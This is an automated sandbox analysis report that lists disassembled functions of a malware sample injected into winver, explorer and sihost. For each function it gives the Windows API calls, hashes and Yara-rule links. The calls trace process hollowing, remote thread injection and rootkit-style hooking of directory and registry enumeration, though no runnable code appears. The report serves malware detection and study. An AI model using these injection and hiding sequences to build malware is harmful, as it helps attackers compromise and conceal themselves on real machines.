Function 00D40908 Relevance: 3.0, APIs: 2, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(Function_00000643,Function_00000643,00000000,00000000,00000000,00000000), ref: 00D4092A
CreateThread.KERNELBASE(Function_00002906,Function_00002906,00000000,00000000,00000000,00000000), ref: 00D40941

Part of subcall function 00D40D29: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D40D48
Part of subcall function 00D40D29: Sleep.KERNELBASE(000003E8), ref: 00D40D5E
Part of subcall function 00D40D29: Process32First.KERNEL32(?,00000000), ref: 00D40D7E
Part of subcall function 00D40D29: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00D40DB3
Part of subcall function 00D40D29: FindCloseChangeNotification.KERNELBASE(00000000,0000094C,00000000), ref: 00D40DC9
Part of subcall function 00D40D29: Process32Next.KERNEL32(?,?), ref: 00D40DDF
Part of subcall function 00D40D29: FindCloseChangeNotification.KERNELBASE(?), ref: 00D40E0B
Part of subcall function 00D40D29: Sleep.KERNELBASE(000003E8), ref: 00D40E16

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Create$ChangeCloseFindNotificationProcess32SleepThread$FirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2613248234-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: adfb4248778087f76d01eaa82a24b3ab4fd5cad4f9e899af1897270130052938
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: C7F082BA914504AFFF007FB09C89C7B3A9CEF403017440535FD46DA49ADE348C588975

Function 00D41528 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00D41522,00000006,?,00000000), ref: 00D4152D

Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA

Part of subcall function 00D41386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413B3
Part of subcall function 00D41386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413C8
Part of subcall function 00D41386: VirtualProtect.KERNELBASE(?,00000020,?,00D41434,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D4142F

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Virtual$Protect$AddressAllocLibraryLoadProc
String ID:
API String ID: 2821516111-0
Opcode ID: dc98e942ed6572570476fd510eaf228d67191d5608389ae8dfb7c1d45d059c83
Instruction ID: 26208938afcc5fdc08d3e939952782b49026242cd123655574f280d9b14aec38
Opcode Fuzzy Hash: dc98e942ed6572570476fd510eaf228d67191d5608389ae8dfb7c1d45d059c83
Instruction Fuzzy Hash: 84115FB24045149FDF03AF60D5C9CAA73ECEE40704B450A6AADC5EF44AEF749194CAF5

Function 00D417E5 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON

Download Yara Rule

APIs

RtlCreateUserThread.NTDLL ref: 00D41848

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: CreateThreadUser
String ID:
API String ID: 1531140918-0
Opcode ID: 14d2b1faf300dbb356a30ca305c1ce6f8e21fe939645fc129a070b0e5d482ed7
Instruction ID: c3372383a5a7fdb36eaf37a1b4586bddb6cf27023bf4fd810c1669143b9a6531
Opcode Fuzzy Hash: 14d2b1faf300dbb356a30ca305c1ce6f8e21fe939645fc129a070b0e5d482ed7
Instruction Fuzzy Hash: 99016D70518F0C8FD794EF1C9849B657BE0FBE8311F01875BA448C7271CA34D5888B82

Function 00D40651 Relevance: 1.5, APIs: 1, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNELBASE(00000000,00000000), ref: 00D40666

Part of subcall function 00D40688: LoadLibraryA.KERNELBASE(00D4067F,00000009,?,00000000), ref: 00D4068D
Part of subcall function 00D40688: lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
Part of subcall function 00D40688: lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
Part of subcall function 00D40688: Sleep.KERNELBASE(00001388), ref: 00D4070A
Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
Part of subcall function 00D40688: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
Part of subcall function 00D40688: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
Part of subcall function 00D40688: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Create$AttributesDirectoryFile$AllocLibraryLoadMutexSleepVirtuallstrcatlstrcmpi
String ID:
API String ID: 769654144-0
Opcode ID: fba5d1f79184c0cf2ad517d7be02013e5e7038f95750940897284c802d14dfb3
Instruction ID: 2e1ccece6226f7f15e7fa1d9c68ceb3524bdcc9936f2cbd5da927496b0a488f3
Opcode Fuzzy Hash: fba5d1f79184c0cf2ad517d7be02013e5e7038f95750940897284c802d14dfb3
Instruction Fuzzy Hash: D0E0C2711503157EEB029A708D89FAA779CEF00700F0841AAFF8A9E0C6E63014108676

Non-executed Functions

Function 00D42DF8 Relevance: 15.1, APIs: 10, Instructions: 115encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00001000,00D459C4,00000000,00000000), ref: 00D42E37
CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,00001000,00008000,00000000,?,00000000), ref: 00D42E74

Part of subcall function 00D42ECB: CryptAcquireContextA.ADVAPI32(00000000,00000000,00D42E9C,0000002F,?,00000000,00000001,F0000000), ref: 00D42EDC
Part of subcall function 00D42ECB: CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 00D42F02
Part of subcall function 00D42ECB: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 00D42F25
Part of subcall function 00D42ECB: CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 00D42F3F
Part of subcall function 00D42ECB: CryptVerifySignatureA.ADVAPI32(?,00000000,-00000004,?,00000000,00000000), ref: 00D42F5F
Part of subcall function 00D42ECB: CryptDestroyHash.ADVAPI32(?), ref: 00D42F6D
Part of subcall function 00D42ECB: CryptDestroyKey.ADVAPI32(?), ref: 00D42F79
Part of subcall function 00D42ECB: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D42F87

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireBinaryCreateDataDecodeImportInfoObjectPublicReleaseSignatureStringVerify
String ID:
API String ID: 1317902371-0
Opcode ID: 8354e4fbaef6a43054a49a658050928748deb7c72ae58bd6602e066a0f6c0e37
Instruction ID: 21f7d4811debc8fcedbba5858d99c7eb35ad4ea232d60c9e91d1a5c02bcb9765
Opcode Fuzzy Hash: 8354e4fbaef6a43054a49a658050928748deb7c72ae58bd6602e066a0f6c0e37
Instruction Fuzzy Hash: 50416031544218BFEF224F20CC85FE9B7B9EF04B00F4402D5BA85AE095DBB09994CFA4

Function 00D42ECB Relevance: 12.1, APIs: 8, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00D42E9C,0000002F,?,00000000,00000001,F0000000), ref: 00D42EDC
CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 00D42F02
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 00D42F25
CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 00D42F3F
CryptVerifySignatureA.ADVAPI32(?,00000000,-00000004,?,00000000,00000000), ref: 00D42F5F
CryptDestroyHash.ADVAPI32(?), ref: 00D42F6D
CryptDestroyKey.ADVAPI32(?), ref: 00D42F79
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D42F87

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
String ID:
API String ID: 295346115-0
Opcode ID: f40c9d135dbbaf6ec7dd8b54680c9dfcd460e274785a9cddeeabdc8bf7b7b054
Instruction ID: d4d669ad2c4327723f35aca186a7658162f49f963de97660c1afd0252b2d6c42
Opcode Fuzzy Hash: f40c9d135dbbaf6ec7dd8b54680c9dfcd460e274785a9cddeeabdc8bf7b7b054
Instruction Fuzzy Hash: 0D11EC71644114BBEF221F20CC85FE97B75EF54700F5441D4BA89BD0A4DBB19AA0DF68

Function 00D4097F Relevance: 18.1, APIs: 12, Instructions: 120sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00D4099A
RtlExitUserThread.NTDLL(00000000), ref: 00D409A2
OpenMutexA.KERNEL32(001F0001,00000000), ref: 00D409C2
GetStartupInfoA.KERNEL32(00000000), ref: 00D409DA

Part of subcall function 00D40A1A: CreateProcessA.KERNEL32(00000000,00D40A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 00D40A21
Part of subcall function 00D40A1A: GetThreadContext.KERNEL32(?,00000000), ref: 00D40A49
Part of subcall function 00D40A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 00D40A74
Part of subcall function 00D40A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,00D459C8,00000000,00000000,00000002), ref: 00D40AB9
Part of subcall function 00D40A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 00D40AE7
Part of subcall function 00D40A1A: ResumeThread.KERNEL32(?), ref: 00D40AF7
Part of subcall function 00D40A1A: Sleep.KERNEL32(000003E8), ref: 00D40B07
Part of subcall function 00D40A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 00D40B1E

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: 761bbbead5cd20da5c35d35d56282458c15599a2a0f4afc317e9a196e341a1d2
Instruction ID: 0304a726e795ef86091dff0e8aeb449839f4511edb46109873e6a4d18364f8f8
Opcode Fuzzy Hash: 761bbbead5cd20da5c35d35d56282458c15599a2a0f4afc317e9a196e341a1d2
Instruction Fuzzy Hash: 2A413071640214AFEB129F60CC85FA977BCEF44744F080195BB49FE0D6DB709A94CA69

Function 00D435B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 00D435AA
lstrcat.KERNEL32(00000000,00D435B5), ref: 00D435B9
Process32Next.KERNEL32(00000000,00000000), ref: 00D435CA
lstrlen.KERNEL32(00000000), ref: 00D435D5

Part of subcall function 00D427B3: VirtualAlloc.KERNEL32(00000000,-00000005,00003000,00000004,?,00000000), ref: 00D427CE
Part of subcall function 00D427B3: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,-00000005,00000004,?,00000000), ref: 00D4284E

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 00D435EF
CloseHandle.KERNEL32(00000000), ref: 00D435F6

Strings

W, xrefs: 00D435D1

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Virtual$Freelstrcat$AllocCloseHandleNextProcess32lstrlen
String ID: W
API String ID: 1151960628-655174618
Opcode ID: 21e0c4b316834c90e5a0ec7aeb5a7caae152be6646dd53a42859772c0c124739
Instruction ID: 415552966565eb575c42a4022d847bf5e26251e6a7ef49f2bc22234fb211b4f8
Opcode Fuzzy Hash: 21e0c4b316834c90e5a0ec7aeb5a7caae152be6646dd53a42859772c0c124739
Instruction Fuzzy Hash: CDF03C71205550AFEB126F208CC9FBE3ABCAF41705F0400A8FE85F905ADBA446569A7A

Function 00D40A1A Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00D40A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 00D40A21
GetThreadContext.KERNEL32(?,00000000), ref: 00D40A49
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 00D40A74
DuplicateHandle.KERNEL32(000000FF,000000FF,?,00D459C8,00000000,00000000,00000002), ref: 00D40AB9
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 00D40AE7
ResumeThread.KERNEL32(?), ref: 00D40AF7
Sleep.KERNEL32(000003E8), ref: 00D40B07
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 00D40B1E

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: 9f95e6e505d3003ba15fac6590d4d8585dd5cd7f164cf91579dc4005578e3fd0
Instruction ID: 74762b9d3e954f04d872fae6ab94741d9e3f33f8878bd30e9eccb4eeb2b7a56e
Opcode Fuzzy Hash: 9f95e6e505d3003ba15fac6590d4d8585dd5cd7f164cf91579dc4005578e3fd0
Instruction Fuzzy Hash: 26315E71640218AFEF228F50CC85FA977B8FF04744F080198AB59FE0E6DB709A90CE64

Function 00D432C2 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 00D432E6
GetStartupInfoA.KERNEL32(00000000), ref: 00D43330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00D432B1,00000011,?,00000000,00A00000), ref: 00D4335D
CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43369
CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43375

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 4a7d3bdf96bcd136d845fcf4cc7e61d2247fbc6a5559b8647c627d2f57814357
Instruction ID: aa406fb617d6373c3f08347d7dee6bcbcca70db8e768b79053c2b29d5074f383
Opcode Fuzzy Hash: 4a7d3bdf96bcd136d845fcf4cc7e61d2247fbc6a5559b8647c627d2f57814357
Instruction Fuzzy Hash: CB11FEB2404518AFEF12AB64CC89FAFB7F9EF50305F4544A9E985A6045DA349A808EB1

Function 00D4328F Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 00D432E6
GetStartupInfoA.KERNEL32(00000000), ref: 00D43330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00D432B1,00000011,?,00000000,00A00000), ref: 00D4335D
CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43369
CloseHandle.KERNEL32(?,?,00D432B1,00000011,?,00000000,00A00000,00A00000,00D4316A,00000004,00000000), ref: 00D43375

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 42ff20205ee4aab94cd3072db40cb3a758061773956fc6871cc72a3358a69797
Instruction ID: 488b3fae5da41ae81d60491fb1ebcee65ce1f8a9d3fca208a938cf996747e011
Opcode Fuzzy Hash: 42ff20205ee4aab94cd3072db40cb3a758061773956fc6871cc72a3358a69797
Instruction Fuzzy Hash: 86111FB28045589FEF126F64CC89BAFB7F8EF40305F4544A9E985A6005DA349A80CEB1

Function 00D43FDE Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,00D43FD4,0000000A,?,00000000,0000000A), ref: 00D43FFE
Sleep.KERNEL32(000003E8,00000000,?,00D43FD4,0000000A,?,00000000,0000000A), ref: 00D44020
Sleep.KERNEL32(000007D0), ref: 00D44030
Sleep.KERNEL32(00000BB8), ref: 00D44040

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 6670859622c68b8e8afc5423a292660a4c178c6049e802073782c2936fe328c1
Instruction ID: bc9865ec1f299943c5a1066cb7d0468e1823c833a536fb657a23b8603252000d
Opcode Fuzzy Hash: 6670859622c68b8e8afc5423a292660a4c178c6049e802073782c2936fe328c1
Instruction Fuzzy Hash: 92F0C970548390EBFB517BB0DC8AB4D36A8DF41709F040091FB8ABE496CE7885E09E76

Analysis Process: explorer.exePID: 4004, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	140
Total number of Limit Nodes:	9

Executed Functions

Function 00F81FD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00F82028
WriteProcessMemory.KERNEL32 ref: 00F8204A
CreateRemoteThread.KERNEL32 ref: 00F82072

Strings

@, xrefs: 00F82020

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
String ID: @
API String ID: 1718980022-2766056989
Opcode ID: cbd7b8d56efd72a16140fb9055a22f05fc48865d3e098cb5d1dadfcfd1d963b1
Instruction ID: 6b1b664621c4495f9d00df8459ed24429872eb362384865df19fe5595f196341
Opcode Fuzzy Hash: cbd7b8d56efd72a16140fb9055a22f05fc48865d3e098cb5d1dadfcfd1d963b1
Instruction Fuzzy Hash: 5F114F3170C9084FE758EA1CE809B6577DAF7D8331F15036FE48AC3295EE7899168785

Function 00F822BA Relevance: 1.6, APIs: 1, Instructions: 132
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDirectoryFile.NTDLL ref: 00F8232B

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: DirectoryFileQuery
String ID:
API String ID: 3295332484-0
Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
Instruction ID: 8fcdaa7c1e5f862b56b8d448f3a96c92ea8ba6b8d5bf28ef1edcbfc130419a1c
Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
Instruction Fuzzy Hash: 4D411D30A14A4D8FDFD0FF5CC8A4BA97BE0FB69361F50156AE809C7254D778E8849B41

Function 00F8221B Relevance: 1.6, APIs: 1, Instructions: 83
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtEnumerateValueKey.NTDLL ref: 00F82281

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
Instruction ID: d6f1549097ab7dc1a47c669d7d4b4af566ef1bb606e3f0a81b5d29d7f1fadbb2
Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
Instruction Fuzzy Hash: 99217F31914E1D8F9F90FF18C8056EA77E1FBA8365B410756EC0AD3204C730E98197C1

Function 00F81F2B Relevance: 1.6, APIs: 1, Instructions: 54
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateUserProcess.NTDLL ref: 00F81F7D

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41

Function 00F81DA4 Relevance: 4.6, APIs: 3, Instructions: 123
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00F81DE3
VirtualAlloc.KERNEL32 ref: 00F81E1C
VirtualProtect.KERNEL32 ref: 00F81EA0

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction ID: d5863f9d28ef6cd21516fda7581fbeeffd702fa5daf1f42db2279bdbd315b8a5
Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction Fuzzy Hash: 24210730A34C1D0BEB28727C8859764B6D6F79C320F9803A5E90AD36D8ED58DC8287C5

Function 02DF0908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 02DF096B
RtlExitUserThread.NTDLL ref: 02DF0974

Memory Dump Source

Source File: 00000004.00000002.3369853200.0000000002DF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_explorer.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 3177259074d73398496aee8d84e8e5b7fc12ab2389d3e597ac5501920ec841ce
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: CCF05EB2514504AFFB807B709C8887B769DEE40302B4A0535FE4ADA59DED359C148979

Function 00F808E2 Relevance: 1.5, APIs: 1, Instructions: 14
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExitUserThread.NTDLL ref: 00F808FD

Memory Dump Source

Source File: 00000004.00000002.3354275429.0000000000F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_explorer.jbxd

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 7a05cdd2f0e1a08064be9a74ce13206ca30c34d530db88e3c80cf592066d6b20
Instruction ID: 355895e72123fa1c01ace67833bef28f9a5d75cf7239259d572cf507d4e6a4de
Opcode Fuzzy Hash: 7a05cdd2f0e1a08064be9a74ce13206ca30c34d530db88e3c80cf592066d6b20
Instruction Fuzzy Hash: 3CC08C15D30808028E4077702C470DC345CFD103223C00734E402C0187EC2C801EA22A

Analysis Process: sihost.exePID: 3368, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	83
Total number of Limit Nodes:	5

Executed Functions

Function 00D0221B Relevance: 1.6, APIs: 1, Instructions: 83
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtEnumerateValueKey.NTDLL ref: 00D02281

Memory Dump Source

Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d00000_sihost.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
Instruction ID: b67613b843bd79389cef530c94ed65add13065cffe6e938a298448252ba71ec1
Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
Instruction Fuzzy Hash: 86218C31814E1D8FCF51EF6888086BA77E5FBA8368B450716E84DD3244C730D88087D5

Function 00D01DA4 Relevance: 4.6, APIs: 3, Instructions: 123
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00D01DE3
VirtualAlloc.KERNELBASE ref: 00D01E1C
VirtualProtect.KERNELBASE ref: 00D01EA0

Memory Dump Source

Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d00000_sihost.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction ID: 64e4a77ac6cbae166c97ec8185b555dd149ef1a7339be5febfc1ff91a105abdd
Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction Fuzzy Hash: 2B214D34A34C1D0BEB18A27C8859768F6D2E79C320F9803A9E90ED36D8ED58CC8187D5

Function 00D00908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00D0096B
RtlExitUserThread.NTDLL ref: 00D00974

Memory Dump Source

Source File: 00000005.00000002.3338393026.0000000000D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d00000_sihost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: b51a704314288d1b0f1b7bf0bbd3c43db8584f69feebe1071ffab75a69e2b621
